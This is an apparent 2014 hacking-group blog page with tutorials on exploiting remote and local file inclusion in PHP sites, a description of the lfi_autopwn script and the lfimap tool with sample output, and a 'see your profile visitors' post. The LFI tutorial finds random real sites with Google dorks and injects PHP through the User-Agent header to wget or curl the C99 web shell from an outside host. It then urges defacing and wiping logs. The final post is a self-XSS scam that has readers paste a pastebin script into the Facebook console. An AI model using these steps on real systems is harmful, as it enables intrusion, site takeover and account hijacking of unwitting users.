1ND14N H4X0R5 T34M (IHT) JAI HIND JAI BHARAT

We are :- DeadManINDIA,Null_Port_Govind,Haxor Rahul,EagleShadow,Karate-Katrina,Spy-Hunter,Grey-Noob,Mr.R@66!T.

A big Slute to Our Indian Armies

Freedom is not free Our Soldiers Donates theirs lifes for us

We are Indians and We are Proud to be Indians

India is great.Because their is one place in the world where Peoples Recpect all Religious.

Kali is good OS for Hacking

Peoples Says this OS is best This OS is best but no one OS like Kali Linux .

MOM and DAD

I can't saw God but When i see my MOM and DAD then i think God in there they are My Gods Love You MOM DAD.

Thursday, 20 March 2014

RFI Full Tutorial For All New N00bs

Intro: What is RFI??



RFI means Remote file inclusion. 
RFI is a type of web application security hole.
On the net, there are so many sites which are vulnerable to RFI.

In this tutorial, I am going to show you RFI with PHP. 
PHP is a web script engine. Its the most widely used one so that's why I am using it in this tutorial.

Learn more about PHP: http://php.net

http://en.wikipedia.org/wiki/PHP


To understand what file inclusion is I am going to show a little example.
This is an example site in PHP:




PHP Code:<?php   $content = “Hello and welcome to the site”;?><html><head><title>Hello world</title></head><body>
<?php echo($content); ?>
</body></html>


This is a very basic page. But as your page expands you might
want to put the individual pages in their own files and include them in
the main file depending on user input.
This way, when you got pages with perhaps 10k lines of PHP code you don't have to use hours looking
for the bit of code you want to edit/view.

By user input I mean things like a URL GET argument. A GET argument could look like this:

HTML 
www.site.com/index.php?page=index

In the above example the PHP script would see the “page=index” and then show the content of “index”. The “index” can be anything, can be a file, SQL value, hard-coded variable. If it is a file, then the PHP script is most likely using the include() function and that is file inclusion.


1.Understanding RFI

So, in the above text I said that file inclusion is including files in another file. Well, that is all right but what does that actually mean?

Well, lets say we got 2 files.
index.php
content.php

The index.php is the file people is going to view when they visit my page. www.site.com as usual. But we want index.php to display the contents of content.php without the user actually visiting content.php.

All you would need to do is put this PHP script in the index.php:
 
 (php)
PHP Code: <?php include(&#8220;content.php”); ?>

Now we are showing the contents of content.php when the user visits index.php. If content.php was to include more PHP code it would also get executed.

That is it. We just did file inclusion! However, this example is just a dummy page and would most likely not be found in real life.


Lets create a new scenario. A more realistic scenario. We got the following files/pages:

index.php
1.php
2.php
3.php

Now, index.php is again the file the users are going to visit. On the default index we are going to display 3 links.

www.site.com/index.php?page=1
www.site.com/index.php?page=2
www.site.com/index.php?page=3

When the user clicks the first link its going to show the content of 1.php, when the user clicks the second link its going to show the contents of 2.php and when the user clicks the last link its going to show the contents of 3.php.

The index.php script site would in this case look something like this(note that I am now coding like an idiot to create security holes):

Code: (php)
PHP Code: if (isset($_GET['page'])) {
   include($_GET['page'] . &#8220;.php”); } else {
   echo('<p><a href="index.php?page=1">page1</a></p>');
   echo('<p><a href="index.php?page=2">page2</a></p>');
   echo('<p><a href="index.php?page=3">page3</a></p>');

The content of 1,2 and 3 is not important in this example so I wont say anything about that.

Now, when a user clicks the page1 link he or she is taken to www.site.com/index.php?page=1

The PHP script in index.php will now see that the user is requesting the page called 1 and it will include the number in the URL + “.php” the same goes for 2 and 3.


Now, what is this “Remote” part in RFI all about? Well, this belongs more in the “exploting RFI vulnerabilities” part of this tutorial but I have to say something short about it now.

The above code is vulnerable to RFI. You can test this by visiting:
www.site.com/index.php?page=4

That would give us an error(assuming the server administrator have not turned off “show errors” in the PHP configuration). The error would look something like this:
Warning: include(page4.php) [function.include]: failed to open stream: No such file or directory in PATH on line 3
Warning: include() [function.include]: Failed opening 'page4.php' for inclusion (include_path='.;PATH') in PATH\index.php on line 3

This would tell us that the include() function used in this script is not secured and can be exploited. The way you exploit it is by getting it to include your code so that you can control the server. This is where the “remote” part of RFI comes in. You can create a PHP script and save it as .txt, upload it to a server and then visit something like this:

http://www.site.com/index.php?page=http://hacker.com/shell.txt?

Note that the ? is to get rid of the “.php” at the end as we did not name the file .txt.php and also if you where to try to include a .php file from a remote server it will only give the executed output of the PHP file.

Now we have successfully put out code in the PHP engine of the victim server and we are free to do whatever you can do with PHP. Which is mostly anything.


 2.Finding RFI vulnerabilities


Like said above. To check for the most basic vulnerabilities all you need to do is manipulate the GET arguments and look for error messages looking like the one above. For more advance ones you might need to try things out, this is called blind RFI. As you gain more knowledge about PHP and RFI you will understand how to perform blind RFI's.

Here is a few examples of GET arguments manipulating:

www.site.com/index.php?id=1→
www.site.com/index.php?id=1asdfsaf
www.site.com/index.php?id=index→
www.site.com/index.php?id=fuckkkk
www.site.com/index.php?id=lolzzzz


Use your imagination... And for those who did not understand. The arguments does not need to be “id” or “page” or “site”. It can be anything.

There are more advance versions of RFI like POST argument RFI and even cookie RFI and HTTP header RFI and so on. But these should be easy to understand once you gain more knowledge about the HTTP protocol and TCP/IP with HTTP servers and PHP etc.

3.Exploiting RFI vulnerabilities


Lets say that you have successfully found a vulnerable page.

The URL is www.site.com/index.php?page=index

The PHP script is made in such a way that we only need to edit page=index to page=http://hacker.com/shell.txt and we now got our PHP code over to the victims server and it executes.

What you should do now is try to make something called a shell. A shell is essentially just a PHP script that can perform Explorer like actions. Like read/write/edit/create files and navigate in folders etc etc. Some shells even got inbuilt exploits to gain root access on the server, but that's another story.

Now, there is a truckload of premade shells out there but I really recommend you creating your own as it is good learning and most shells is actually detected by antiviruses believe it or not. So if the server you are trying to access got a antivirus it will now work and it might perhaps spoil your attack.

4.Securing RFI vulnerabilities


Secure user inputs!!!! And not just those you THINK is used in SQL queries or include functions or etc. ALL user inputs should be secured. You do this by strip/disallow words or phrases or symbols in the user inputs. And the most common solution when it comes to RFI is just to make the page less dynamic and hardcode the pages. If you still want to have a dynamical editable page you MUST make sure you secure the user inputs. Check it for the word “http”, check it for the word “www.”, check it for “../”, check it for “?” etc etc. Disable “show PHP errors” in the PHP configuration. Do a file_exists() check. These are all easy things you can do to prevent RFI(and LFI, but that is again another story).

Here is a example on a dynamic page and a hardcoded page. The dynamic one is not secure, the hardcoded one is.

Dynamic:
PHP Code: if (isset($_GET['page'])) {
   include($_GET['page'] . “.php”); } else {
   echo('<p><a href="index.php?page=1">page1</a></p>');
   echo('<p><a href="index.php?page=2">page2</a></p>');
   echo('<p><a href="index.php?page=3">page3</a></p>'); }  

Hardcoded:
PHP Code:
if (isset($_GET['page']))
{
   if ($_GET['page'] == “page1”)
      include(“1.php”);

   if ($_GET['page'] == “page2”)
      include(“2.php”);

   if ($_GET['page'] == “page3”)
      include(“3.php”);
}
else
{
   echo('<p><a href="index.php?page=1">page1</a></p>');
   echo('<p><a href="index.php?page=2">page2</a></p>');
   echo('<p><a href="index.php?page=3">page3</a></p>');
}  

LFI with perl script :D

Source Download from here

Features

  • Signature-free
  • Session Splicing
  • User-Agent and Log injection
  • Arithmetic Test

Usage

 perl lfi_autopwn.pl -h www.vuln.tld -u "/vuln.ext?page=main&foo=bar" -i page
This script will attempt to gain code execution on sites vulnerable to local file inclusion via an httpd error log or by modifying the user-agent and including a file containing environment variables. The php code execution test is performed using an arithmetic challenge, and the script uses system() as its php execution function. The fact that every part of this process is randomized including the math challenge prevents signature based detection while LibWhisker provides IDS Evasion.
Notice: It is possible that this script will not work on your intended target but tests positive for php execution. In that case, changing your bash command execution function from system to one of many others is most likely to yield the desired results.
Protip: Make sure you've saved httpdlogs.conf to the same directory as lfi_autopwn.pl.


httpdlogs.conf

c3el4.png The httpdlogs.conf file dictates filenames for possible error log locations.
If you know any filenames that aren't listed here, feel free to add them to your local copy. Files are simply separated by newline.
  • ./err.log
  • ./error_log
  • ./error.log
  • /etc/httpd/conf/logs/error_log
  • /etc/httpd/logs/error_log
  • /home/php5/logs/error_log
  • ../log/error_log
  • ../log/error.log
  • ../logs/error_log
  • ../logs/error.log
  • /proc/self/fd/2
  • /usr/local/apache2/log/error_log
  • /usr/local/apache2/logs/error_log
  • /usr/local/apache2/logs/error.log
  • /usr/local/apache/error.log
  • /usr/local/apache/log/error_log
  • /usr/local/apache/logs/error_log
  • /usr/local/apachessl/logs/dummy-host.example.com-error_log
  • /usr/local/apachessl/logs/error_log
  • /usr/local/httpd/log/error_log
  • /usr/local/httpd/logs/error_log
  • /usr/local/php/log/error_log
  • /var/log/apache2/error_log
  • /var/log/apache2/error.log
  • /var/log/apache/error_log
  • /var/log/httpd-error.log
  • /var/log/httpd/error_log
  • /var/log/nginx/error.log
  • /var/log/php-fcgi/error_log
  • /var/log/php-fpm/err.log

Other Execution/Interesting PHP Functions

passthru, leak, link, shell_exec, exec, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo => php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abord, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo

How to use lfimap tool for LFI :D

Installation

$ cd /data/src/
$ wget http://lfimap.googlecode.com/files/lfimap-1.4.8.tar.gz
$ mkdir -p /pentest/web/
$ tar xvzf lfimap-1.4.8.tar.gz -C /pentest/web/

Usage

Syntax

$ python lfimap.py -t <target> [options]

Options

--target, -t <target>
Target. E.g. http://www.test.com/ss.php?page=[LFI HERE]
--null, -n
Put a null byte to bypass some controls
--user, -u <user>
Is used to send username in basic authentication
--passw, -p <password>
Is used to send password in basic authentication
--proxy, -w <proxy>
Proxy support
--output, -o <file>
Set Output file
--hexa, -x
Encode the url to hexa

Examples

Example #1: PoC

Description

The following example is based on a specific vulnerable code (download it here) that doesn't properly check/sanitize user inputs and is hence vulnerable to LFI attacks. LFIMap has been tested against this application as a Proof of Concept.

Stdout

LFIMap has been called with following parameters:
$ python lfimap.py -t "http://127.0.0.1/poc/LFI/index.php?page=page2.txt" -o report.html
Here is the output on the screen:
 lfi detected in "page" parameter
--------------------------------------------------------------------
Made by Augusto Pereyra
Thanks to www.artsweb.com.ar
This code is distributed under GPL Licence
Detecting root path of site
--------------------------------------------------------------------

Going down 0 folder
Going down 1 folder
Going down 2 folder
Going down 3 folder
Going down 4 folder
Going down 5 folder
root path finded in: 
-------------------------------------------------------------
http://127.0.0.1/poc/LFI/index.php?page=../../../../../&
 The root of the File system was found 6 levels down
 This is a Linux System
-------------------------------------------------------------
2011-02-03 06:52:45.401371
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../proc/version&
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/apache2/apache2.conf&
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/mysql/my.cnf&
Possible password detected in this file
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/sysctl.conf&
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/passwd&
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/ts.conf&
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/ca-certificates.conf&
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/debconf.conf&
Possible password detected in this file
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/bash_completion.d/debconf&
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/xdg/user-dirs.conf&
==============================================================
File Found: 
http://127.0.0.1/poc/LFI/index.php?page=../../../../../etc/gnome-vfs-2.0/modules/default-modules.conf&
(...TRUNCATED...)

Generated report

Here is an extract of the generated html report:
Lfimap-generated-report-1.png

Proof of Concept

By clicking on one of the links from the generated html report, here is the proof of concept. We can see that the application is vulnerable to LFI attacks.
Lfimap-poc-1.png

Tuesday, 18 March 2014

How to hack a website with Local file inclusion or LFI


To find a vulnerable website, we will be using what is known as a Google 'dorks; simply Google search a specific string or term to yield the desired results. often considered hacking' class='bbc ipSeoAcronym'>dork'. All you have to do is paste the dorks; simply Google search a specific string or term to yield the desired results. often considered hacking' class='bbc ipSeoAcronym'>dork into Google search, and see what you find!
 

allinurl:index.php?page=


Essentially you can replace 'index' and 'page' with whatever words you want and then search for that.

For example, you can use:



allinurl:site.php?site=


Once you paste your dorks; simply Google search a specific string or term to yield the desired results. often considered hacking' class='bbc ipSeoAcronym'>dork into Google, you should come up with a list of website which contain that URL, simply go to one of these and then follow the steps below!

NOTE: Few sites are vulnerable to LFI, but they do exist! You just have to keep searching until you find one.

So, let's say that we find the following site using our dorks; simply Google search a specific string or term to yield the desired results. often considered hacking' class='bbc ipSeoAcronym'>dork:

http://www.site.com/index.php?page=contacts.php



What we're going to do is replace contacts.php with 'null', so that you get the following:

http://www.site.com/index.php?page=null



If you see a list of errors running down the page, or missing content (pictures, text etc.), then the site is vulnerable and we may continue, otherwise just move on to the next site.

Now, we're going to try and connect to a file which we know exists on Linux servers, /etc/passwd.

Since index.php has the rights to connect to a file like contacts.php, it's possible that the administrator has forgottten to restrict its access to other files, including the files containing sensitive data.

We're going to try to read the file "/etc/passwd" which contains data on root users, etc.

So, now change your URL to:

http://www.site.com/index.php?page=/etc/passwd



If you see a large list of data appear, then that's great, the site is completely vulnerable to LFI, and you've pretty much got this in the bag.

If you don't see this data, but get a 403 error or more errors, then move on to another site.

Now, change your URL again to:

http://www.site.com/index.php?page=/proc/self/environ



If you now see a new set of data, that's great.

If somewhere in the data the following is shown, then that's even better.




DOCUMENT_ROOT=((Random value here))


If not, unfortunately you'll have to move on, there are ways to circumvent this, but I'm keeping this tutorial as basic as I can.

Now, open up Tamper Data, and change your User Agent value to the following:




<?system('id');?>


This is a basic PHP code to check if we can execute code on our vulnerable machine.
The page should refresh, and your DOCUMENT_ROOT value should have changed, if it didn't, go for another website.
Now change your User Agent again, this time to




<?system('uname -a');?>


If your User Agent changes again, great.
Now we're going to upload a shell, which will grant us full control of the site, and the ability to deface / root / whatever the fuck you feel like doing.
Change your user agent to the following:




<?system('wget http://www.sh3ll.org/c99.txt -O secret.php');?>


What the above command does is saves a text form of a powerful PHP shell, 'C99' and then renames it to secret.php.
Note: If the above wget command does not work, you should try curling it instead:




<?system('curl -o shell.php http://www.sh3ll.org/c99.txt');?>


Now navigate to your shell, which should be at the following directory:

http://www.site.com/secret.php



NOTE: If your website's vulnerable page was something like

http://www.site.com/dir/dir/dir/index.php?page=contacts.php



Then your shell will be at the directory of the index.php, so for the above case, you will find it at:

http://www.site.com/dir/dir/dir/secret.php



Now that your shell is uploaded, go nuts!

Don't forget to wipe the logs before you leave -- IMPORTANT.

Good luck and have fun!

Monday, 17 March 2014

how to finds your profile visitors


#Use Google Chrome
1- Copy All Code →→ http://pastebin.com/raw.php?i=WwqLxmYe
2- Go To Your Profile (Not Home Page)
3- Press F12 or Right Click→InspectElement→Console.
4- Paste All Script By Press Ctrl+V.
5- Press "ENTER" on Keyboard.
Wait 3-4 minutes You Will Know Who Visiting Your Profile
NOTE: If the application is not working, go here http://www.facebook.com/selfxss > > checkbox reading "Allow My Account to be hijacked if I paste the malicious JavaScript" ** If failed or warning appears, ignore it. Refresh and try again